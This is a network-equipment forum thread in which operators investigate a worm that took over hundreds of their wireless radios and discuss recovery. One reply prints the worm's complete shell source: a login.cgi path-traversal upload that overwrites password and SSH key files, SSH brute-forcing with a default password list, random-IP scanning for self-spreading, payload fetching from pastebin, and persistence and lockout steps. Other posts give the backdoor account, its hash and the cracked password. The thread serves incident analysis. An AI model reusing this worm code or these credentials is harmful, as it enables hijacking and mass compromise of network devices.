Reply
New Member
Posts: 21
Registered: ‎04-22-2015
Kudos: 4
Accepted Solution

Virus atack v2

[ Edited ]

Got 230 units infected this morning all in internal network with no direct access to intern (fimware 5.5.8-5.5.10-u)

get a chanse to geth this information befor radio got restarted it is from /tmp/upload

Question is could we use same way that virus use to infect dadio to get a control back?

 

 

as you see they change username to "moth3r" have to add 

 <pre>

XW.v5.5.10-u2# cd upload/
XW.v5.5.10-u2# ls
authorized_keys  passwd
XW.v5.5.10-u2# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDipI6pZahigzgPRR3TB14ystpbrAedhG8K/J2I/XZpBDw2EHdLMRSwp0Pl6j0hK9WDAhrWR1Xs6dyZeRmfOALFpfkmS3G1enTLLoVQfZqimBNEd6gBPuYK5Z7kcZARtPpYwep/iDAP3f2i4f54So1xs09Gfsoy6ENXM/ei47qJrOlr5CHeqJJRHH8gUyvb6ZHaqi8Hq1tvGfp/ViX07Cf6mzCY/3P0xLHoaDgkbsDreOEIsH2u/laSsmY+cmhAgET7Bf3ddRKB5YyZuIruX8x6a9g+owc5uCKdcCrxEilYwTwLS6lv/WuC/Mhxmg1Z2696z2nou+E1PifMabuJXcnd mother@fu *have to add this to avoid filter* cker
XW.v5.5.10-u2# cat passwd
moth3r:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh
XW.v5.5.10-u2#

</pre>


Accepted Solutions
New Member
Posts: 7
Registered: ‎06-06-2016
Kudos: 3
Solutions: 1

Re: Virus atack v2

I was find interest part of virus code:

 

grep "moth3r" /etc/passwd >/dev/null || echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd
for prt in 80 443; do
iptables -I INPUT -p tcp --dport $prt -j DROP 2>/dev/null
iptables -I INPUT -p tcp -i lo --dport $prt -j DROP 2>/dev/null
done

 

Change user and pass to moth3r:f u c k e.3r

f u c k e r is without space

and block port 80 and 443 at ubnt firewall.

 

If you do not have web access to device you can access over ssh with  moth3r:f u c k e.3r and manuly clean virus.

 

View solution in original post


All Replies
SuperUser
Posts: 16,608
Registered: ‎02-03-2013
Kudos: 9085
Solutions: 597
Contributions: 2

Re: Virus atack v2

You need to upgrade your radios to the latest firmware.  These firmwares are old.  

ubiquiti certified trainer :: ubwa | uewa
New Member
Posts: 21
Registered: ‎04-22-2015
Kudos: 4

Re: Virus atack v2

It awes idea bu there is no acces to radio at all and password changed by virus

what we realy need is discluser of this bug and publicly avale tool to use it to restore acces to the radio

Established Member
Posts: 1,840
Registered: ‎10-05-2014
Kudos: 312
Solutions: 48

Re: Virus atack v2


@Sergei_kha wrote:

It awes idea bu there is no acces to radio at all and password changed by virus

what we realy need is discluser of this bug and publicly avale tool to use it to restore acces to the radio


Can you edit your first post please and put the commind lime output in Code tags <pre>code</pre>

 

Regards,

Do not expect me to reply to this post, I'm not sure that I will be able to find it, thank's to ....

Established Member
Posts: 1,840
Registered: ‎10-05-2014
Kudos: 312
Solutions: 48

Re: Virus atack v2


@ClaudeSS wrote:

You need to upgrade your radios to the latest firmware.  These firmwares are old.  


Old firmware don't have upload directory !!! Beware !!!

Do not expect me to reply to this post, I'm not sure that I will be able to find it, thank's to ....

New Member
Posts: 6
Registered: ‎06-04-2016

Re: Virus atack v2

The password is different

script has a passwd file but inside script is command:

echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd

 

so, the hash is $1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK

anyone crack it?

Established Member
Posts: 1,840
Registered: ‎10-05-2014
Kudos: 312
Solutions: 48

Re: Virus atack v2


@lsl wrote:

The password is different

script has a passwd file but inside script is command:

echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd

 

so, the hash is $1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK

anyone crack it?


echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd

This command will add user moth3r to as Administrator to your password file?

 

No, you don't crack the passwork , you have to bute-force recalculate the hash once you have the salt and  the full hash.  Will take time and CPU.

 

To start the process I need the exact string in between code tagst (html <pre>code</pre>).

 

 

Warning !!!; If you didn't reboot yet just don't !!! , if you do you will be lock out . Get a Linux access , setup a password to your user , go to /etc/passwd, copy the (known)passwd from your user and change the password on Ubiquiti device / save before reboot. Aka Linux boot password bypass without crackjack 

 

Regards,

 

PS. I will see you tomorrow

Do not expect me to reply to this post, I'm not sure that I will be able to find it, thank's to ....

New Member
Posts: 6
Registered: ‎06-04-2016

Re: Virus atack v2

attached mf.tgz

https://www.sendspace.com/file/o10no2

found on ubnt, also with mf.tar

Inside this file is code I pasted

New Member
Posts: 21
Registered: ‎04-22-2015
Kudos: 4

Re: Virus atack v2

Brutforced it sucsessfully

its fu cker 

no space obviusly

New Member
Posts: 21
Registered: ‎04-22-2015
Kudos: 4

Re: Virus atack v2

curent situation is

 

firmware 5.5.10-u    47 units

username moth3r

password fu cker

 

firmware 5.5.10 

 

cpassword change by virus and unknown. moth3r/fu ker doent work

 

I identified attack sours it was an old AirRouter with external ip.

 

New Member
Posts: 6
Registered: ‎06-04-2016

Re: Virus atack v2

 

$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/ is f****r

$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1 is not.

 

checked by hashcat

Highlighted
New Member
Posts: 14
Registered: ‎06-04-2016
Kudos: 3

Re: Virus atack v2

[ Edited ]

today situation is even worse...

after phisicall reset I cannot login too...

 

UPDATE: false alarm. My technician made a reset procedure in a wrong way. But still is about 300 devices left Man Sad

 

New Member
Posts: 7
Registered: ‎06-05-2016

Re: Virus atack v2

Does TFTP reset wth firmware upload works ?

New Member
Posts: 14
Registered: ‎04-10-2012

Re: Virus atack v2

 

We have some devices which have been infected.

The units are PowerBridges and they seem to be rebooting every 30 minutes or so.

 

The Malware has changed the password as I can't log in with our password or mother/fu****r

I have tried moth3r with all sorts of password but no joy

 

Can anyone help with this ? 

 

Jay

Established Member
Posts: 1,840
Registered: ‎10-05-2014
Kudos: 312
Solutions: 48

Re: Virus atack v2


@lsl wrote:

attached mf.tgz

https://www.sendspace.com/file/o10no2

found on ubnt, also with mf.tar

Inside this file is code I pasted

Thank you for sharing

 

# ls
download  infect  mfid  mfid.pub  mother  p  passlst  passwd  scan  sprd

# cat download
#!/bin/sh
if [ ! -z "$1" ]
then
for cc in  "http://pastebin.com/raw/vR3xrUcz"
do
wget -O - $cc |tr -d '\r'>/tmp/mfpl$$
k=`grep nomorelies /tmp/mfpl$$ 2>/dev/null | md5sum | cut -d" " -f1`
[ "$k" = "d709745c628f6682ae506d54e4320a28" ] && mv /tmp/mfpl$$ /tmp/mfpl && break
done
rm /tmp/mfpl$$ 2>/dev/null
fi
[ -e /usr/bin/curl ] && exit 0
per=/etc/persistent/.mf
[ -e $per/curl ] && exit 0
test -d $per || mkdir -p $per
test -d /tmp/down || mkdir /tmp/down
cd /tmp/down
dwn() {
wget -O temp.ipk $1
tar -xzf temp.ipk
tar -xzf data.tar.gz
mv $2 $per
rm -rf /tmp/down/*
}
test -e /etc/openwrt_release && owrt=`grep CODENAME /etc/openwrt_release | sed "s/.*=\([^ /]*\).*/\1/g" |tr -d \'`
arc=adm5120
test -e /etc/openwrt_release && arc=`grep TARGET /etc/openwrt_release | sed "s/.*=\([^ /]*\).*/\1/g" | cut -c 2-`
test ! -z "$owrt" && test ! -e /usr/bin/curl && opkg update && opkg install curl
if test ! -e /usr/bin/curl; then
for srv in "downloads.openwrt.org" "bo.mirror.garr.it/mirrors/openwrt"
do
test -e $per/curl || dwn http://$srv/kamikaze/8.09.1/$arc/packages/curl_7.17.1-1_mips.ipk usr/bin/curl
chmod +x $per/curl
test -e $per/libcurl.so.4 || dwn http://$srv/kamikaze/8.09.1/$arc/packages/libcurl_7.17.1-1_mips.ipk usr/lib/libcurl.so.4.0.1
mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
test -e $per/libssl.so.0.9.8 || dwn http://$srv/kamikaze/8.09.1/$arc/packages/libopenssl_0.9.8i-3.1_mips.ipk 'usr/lib/lib*'
test -e $per/libz.so.1 || dwn http://$srv/kamikaze/8.09.1/$arc/packages/zlib_1.2.3-5_mips.ipk 'usr/lib/lib*'
done
fi

I like Robert Redford in Sneakers

 

 

# cat infect
#!/bin/sh
trap '' HUP
per=/etc/persistent/.mf
cd $per
crl="LD_LIBRARY_PATH=$per/ ./curl"
test -e /usr/bin/curl && crl=/usr/bin/curl
ip=$1
sshprt=$3
pre=$4
[ $(echo $ip|cut -d. -f1) -eq "127" ] && exit 0
if [ -z "$sshprt" ]
then
for prt in 22 2222
do
is=`sh -c "$crl -s  -m 3 $ip:$prt 2>/dev/null|grep -i dropbear|wc -l"`
[ "$is" = "1" ] && { sshprt=$prt;break; }
done
fi
if [ "$2" = "dbss" ] && [ ! -z "$sshprt" ]
then
( sleep 30 ; killall ssh ) &
cat ../mf.tgz | ssh -p$sshprt -y -y -i mfid moth3r@${ip} "mkdir -p /etc/persistent/.mf; cat > /etc/persistent/mf.tgz; cd /etc/persistent/;tar -zxf mf.tgz;/etc/persistent/.mf/p"
exit 0
fi

cu() {
wh=$1
to=$2
ur=$3
sh -c "$crl -s -m 4 -F 'file=@$per/$wh;filename=../../etc/$to' -H 'Expect:' '$ur/login.cgi' -k 2>/dev/null >/dev/null"
}

if [ ! -z "$sshprt" ] && [ -z "$pre" ]
then
for p in "https" "http"
do
is=`sh -c "$crl -s -L -k -c /tmp/ac -m 3 $p://$ip 2>/dev/null | grep airos | wc -l"`
[ "$is" = "1" ] && { pre=$p;break; }
done
fi


if [ ! -z "$pre" ]
then
echo $ip >> /tmp/inf
cu passwd passwd $pre://${ip}
cu mfid.pub dropbear/authorized_keys $pre://${ip}
( $per/infect $ip dbss $sshprt ) &
elif [ ! -z "$sshprt" ] && [ "$BRUT" = "1" ] && grep BEAR_PASSWOR /usr/bin/ssh 2>/dev/null
then
for usr in root ubnt admin; do
for pwd in $(cat passlst); do
cat ../mf.tgz | DROPBEAR_PASSWORD=$pwd ssh -I3 -p$sshprt -y "$usr"@${ip} "mkdir -p /etc/persistent/.mf; cat > /etc/persistent/mf.tgz; cd /etc/persistent/;tar -zxf mf.tgz;/etc/persistent/.mf/p"
done
done
fi

 

 Let see the mother

 

# cat mother
#!/bin/sh
neigh () {
echo 192.168.1.20 > /tmp/near
ubntbox discover|grep ..:..:..:|cut -d" " -f2>>/tmp/near
for ip in `ifconfig | grep Bcast | sed "s/.*Bcast:\([^ ]*\).*/\1/g"`; do ping -c2 $ip;done
ip neigh|cut -d" " -f1|grep -v :>>/tmp/near
for ip in `sort -u /tmp/near`;do
($per/.mf/infect $ip)&
sleep 15
done
}
scneigh () {
max=2500
[ ! -z "$1" ] && max=$1
n=1
for ip in `ifconfig | grep "inet addr:" | grep -v 127.0.0.1 |sed "s/.*inet addr:\([^ ]*\).*/\1/g"`; do
(sleep $((n*max*2)); $per/.mf/scan $ip $max $2>/dev/null >/dev/null )&
n=$((n+1))
done
}
cfg () {
sed -i 's/$1=.*/$1=$2/' /tmp/system.cfg
}
f*ckit () { 
if [ -e /usr/bin/cfgmtd ]
then
grep 'motherf' /tmp/system.cfg>/dev/null || cp /tmp/system.cfg $per/cfg
cfg 'dhcpc.1.status' 'disabled'
cfg 'resolv.host.1.name' 'ubnt'
cfg 'wireless.1.ssid' 'mootherf u c k e r'
cfg 'radio.1.mode' 'Master'
cfg 'system.button.reset' 'disabled'
rm -rf $per/.mf/lib*
(sleep 30; reboot -f) &
/usr/bin/cfgmtd -p /etc -f /tmp/system.cfg -w
fi
}
air () {
[ `cat $per/tick` -gt 4 ] && return
(sleep 3000;reboot -f)&
(wlanconfig ath0 destroy;wlanconfig ath0 create wlandev wifi0 wlanmode sta nosbeacon;iwconfig ath0 essid any;ifconfig ath0 up;iwlist ath0 scan)&
sleep 30
iwlist scan
for cnt in `seq 10`
do
iwlist scan 2>/dev/null| awk -F '[:=]+' '/(ESS)/{ printf $2" " } /level/{printf $4" "} /Encr/{ print $2 }'| grep -v " on" | awk -F' ' '{print $2,$1}'|sort -rn|cut -d'"' -f2>/tmp/aps
killall -9 udhcpc
for ap in `cat /tmp/aps|tr -d'"'`
do
ifconfig ath0 down
iwconfig ath0 essid $ap
ifconfig ath0 up
sleep 40
/sbin/udhcpc -q -f -i ath0 -s /etc/udhcpc/udhcpc -p /tmp/dhp -hmf$$
if [ $? -eq 0 ]
then
neigh
fi
done
done
reboot -f
}
loop () {
per=/etc/persistent
test -d $per/.mf || mkdir -p $per/.mf
cd $per/.mf
echo $((`cat $per/tick 2>/dev/null`+1)) > $per/tick
(cfgmtd -w -p /etc)&
[ `cat $per/tick` -gt 30 ] && f*ckit
shl=`cat /etc/shells | head -1`
test -z "$shl" && shl=/bin/sh
grep "moth3r" /etc/passwd >/dev/null || echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd
for prt in 80 443; do
iptables -I INPUT -p tcp --dport $prt -j DROP 2>/dev/null
iptables -I INPUT -p tcp -i lo --dport $prt -j DROP 2>/dev/null
done
sleep 200
$per/.mf/download;
cnt=0
($per/.mf/sprd 2>/dev/null >/dev/null)&
($per/.mf/sprd 2>/dev/null >/dev/null)&
($per/.mf/sprd 2>/dev/null >/dev/null)&
while true
do
[ "$cnt" -eq 5000 ] && f*ckit
[ $((`date "+%H"`%3)) -eq 0 ] && [ "$cnt" -eq 15 ] && air
[ $((cnt%10)) -eq 0 ] && $per/.mf/download up
[ $((cnt%10)) -eq 0 ] && [ -e /tmp/mfpl ] && chmod +x /tmp/mfpl* && /tmp/mfpl
[ $((cnt%60)) -eq 0 ] && neigh
[ $((cnt%180)) -eq 0 ] && scneigh
[ $((cnt%300)) -eq 0 ] && scneigh 900 -4
pidof sprd>/dev/null || ($per/.mf/sprd 2>/dev/null >/dev/null)&
cnt=$((cnt+1))
sleep 60
done
}
if [ -z "$1" ]
then
($0 1)&
else
loop
fi

 

# cat p
#!/bin/sh
per=/etc/persistent
shl=`cat /etc/shells | head -1`
test -z "$shl" && shl=/bin/sh
grep "moth3r" /etc/passwd >/dev/null || echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >> /etc/passwd
grep "f/mother" $per/rc.poststart 2>/dev/null >/dev/null || echo "cd $per;tar -zxf mf.tgz;$per/.mf/mother&">>$per/rc.poststart
chmod +x $per/rc.poststart
test -e /etc/rc.local && cat $per/rc.poststart>/etc/rc.local
if [ -e /usr/bin/cfgmtd ]
then
echo -n >/etc/dropbear/authorized_keys
cfgmtd -w -p /etc/; sleep 30; reboot -n -f >/dev/null
fi
# cat scan
#!/bin/sh
trap '' HUP
cd /etc/persistent/.mf/
ip=$1
p1=$(echo $ip | cut -d "." -f1)
test ! -z "$p1" || p1=1
p2=$(echo $ip | cut -d "." -f2)
test ! -z "$p2" || p2=0
p3=$(echo $ip | cut -d "." -f3)
test ! -z "$p3" || p3=0
p4=$(echo $ip | cut -d "." -f4)
test ! -z "$p4" || p4=1
p3c=0
p2c=0
p1c=0
[ ! -z "$3" ] && [ "$3" -gt 0 ] &&  p4=$((p4+$3))
[ ! -z "$3" ] && [ "$3" -lt 0 ] && [ $(($p3+$3)) -ge 0 ] &&  p3=$((p3+$3))
if [ "$p4" -gt 255 ]
then
d=$((p4/256))
echo LOG:here $d $p4
p4=$((p4%256))
p3=$((p3+d))
p3=$(($p3%256))
fi
maxp1=128
maxp2=256
cnt=0
test $p1 -eq "10" && pvt=0
test $p1 -eq "192" -a $p2 -eq "168" && pvt=0 && maxp2=1
test $p1 -eq "172" -a $p2 -eq "16" && pvt=0 && maxp2=1
test ! -z "$pvt" && maxp1=1
while [ $p1c -lt $maxp1 ]
do
while [ $p2c -lt $maxp2 ]
do
while [ $p3c -lt 256 ]
do
while [ $p4 -lt 255 ]
do
ip="$p1.$p2.$p3.$p4"
./infect $ip
p4=$((p4+1))
cnt=$((cnt+1))
[ ! -z "$2" ] && [ "$cnt" -gt "$2" ] && exit 0
done
p4=1
p3=$((p3+1))
if [ "$p3" -gt 255 ] ; then p3=0 ; fi
p3c=$((p3c+1))
done
p4=0
p3c=0
p3=0
p2=$((p2+1))
if [ "$p2" -gt 255 ] ; then p2=0 ; fi
p2c=$((p2c+1))
done
p4=0
p3=0
p3c=0
p2=0
p2c=0
p1=$((p1+1))
if [ "$p1" -gt 223 ] ; then p1=1 ; fi
p1c=$((p1c+1))
done
# cat sprd
#!/bin/sh
per=/etc/persistent/.mf
cd $per
test -e /usr/bin/curl && crl=/usr/bin/curl
test -e /usr/bin/curl || test -e $per/curl || ./download
cnt=0
while true; do
ip=`dd if=/dev/urandom bs=4 count=1 2>/dev/null | hexdump -e '4/1 "%u."' -e '"\n"' | cut -d. -f1-4`
$per/infect $ip
if [ "$cnt" = 10000 ] ; then
if [ "$BRUT" = "1" ]
then
export BRUT=0
cnt=0
else
export BRUT=1
cnt=9500
fi
fi
cnt=$((cnt+1))
done

Hmm , smart way to generate random IP, this is not only private networks.

 

# cat passlst
admin
root
ubnt
ubnt123
password
abcd1234
abcdefgh
qwerty
abc123
111111
123456
123123
123qwe
12345678
admin1
!@#$%^&*
ubiquiti
000000
1q2w3e4r
!Q@W#E$R
1qaz2wsx

Look like the mfid file is the dropbear ssh-rsa private key and mfid.pub is the public file.

 

Thanks for sharing again, is raining outside perfect day for reading.

 

Regards,

 

PS. This look like similar to Steve Gibson grc.com attack

 

Do not expect me to reply to this post, I'm not sure that I will be able to find it, thank's to ....

Emerging Member
Posts: 41
Registered: ‎09-23-2010
Kudos: 2

Re: Virus atack v2

i am having the same issue

 

mother

moth3r

f u c k er

 

None are working ... Http, https turned off on antenna's now and can only ssh

 

UBNT any ideas ?

 

 

New Member
Posts: 14
Registered: ‎06-04-2016
Kudos: 3

Re: Virus atack v2

what type is this passwd hash? anyone knows?

Established Member
Posts: 1,840
Registered: ‎10-05-2014
Kudos: 312
Solutions: 48

Re: Virus atack v2


@Heavyd wrote:
 

None are working ... Http, https turned off on antenna's now and can only ssh

 


Do you know howto fix from ssh?

 


 

Conclusion:

 

This is a user/password attack over ssh

 

if [ ! -z "$pre" ]
then
echo $ip >> /tmp/inf
cu passwd passwd $pre://${ip}
cu mfid.pub dropbear/authorized_keys $pre://${ip}
( $per/infect $ip dbss $sshprt ) &
elif [ ! -z "$sshprt" ] && [ "$BRUT" = "1" ] && grep BEAR_PASSWOR /usr/bin/ssh 2>/dev/null
then
for usr in root ubnt admin; do
for pwd in $(cat passlst); do
cat ../mf.tgz | DROPBEAR_PASSWORD=$pwd ssh -I3 -p$sshprt -y "$usr"@${ip} "mkdir -p /etc/persistent/.mf; cat > /etc/persistent/mf.tgz; cd /etc/persistent/;tar -zxf mf.tgz;/etc/persistent/.mf/p"
done
done
fi

Will try login username root ubnt admin and one of the following passwords:

admin root ubnt ubnt123 password abcd1234 abcdefgh qwerty abc123 111111 123456 123123 123qwe 12345678 admin1 !@#$%^&* ubiquiti 000000 1q2w3e4r !Q@W#E$R 1qaz2wsx

 

On infected devices the attack will stop when the ouput of the following URL http://pastebin.com/raw/vR3xrUcz

will be nomorelies ...

 

Idea Look like the revenge of the Pink Panther and is personal.

 

Do not expect me to reply to this post, I'm not sure that I will be able to find it, thank's to ....

Senior Member
Posts: 3,780
Registered: ‎01-13-2009
Kudos: 708
Solutions: 9

Re: Virus atack v2

Same issue here. AC2 is saying "invalid login credentials" on over 1800 devices now, and 2440 are offline! Tha's more than 80% of our network! Unbelievable. Is it an AC2 virus? Can ANYONE please crack this "new" password asap??? 

 

These are all PRIVATE, not public exposed devices, and if the virus was to spread on the same subnet, that is wrong because this is across different subnets and towers, routers, everything. ONLY thing connecting all these together is AC2, could it be an AC2 virus!?!?

 

This is the worst disaster in our WISP history, and it'd be impossible to make over 2,000 truck rolls to reset devices and re-program. 

 

PLEASE ANYONE?!?!

New Member
Posts: 14
Registered: ‎06-04-2016
Kudos: 3

Re: Virus atack v2

redirect pastebin to some http server with prepared file helps?

 

Reply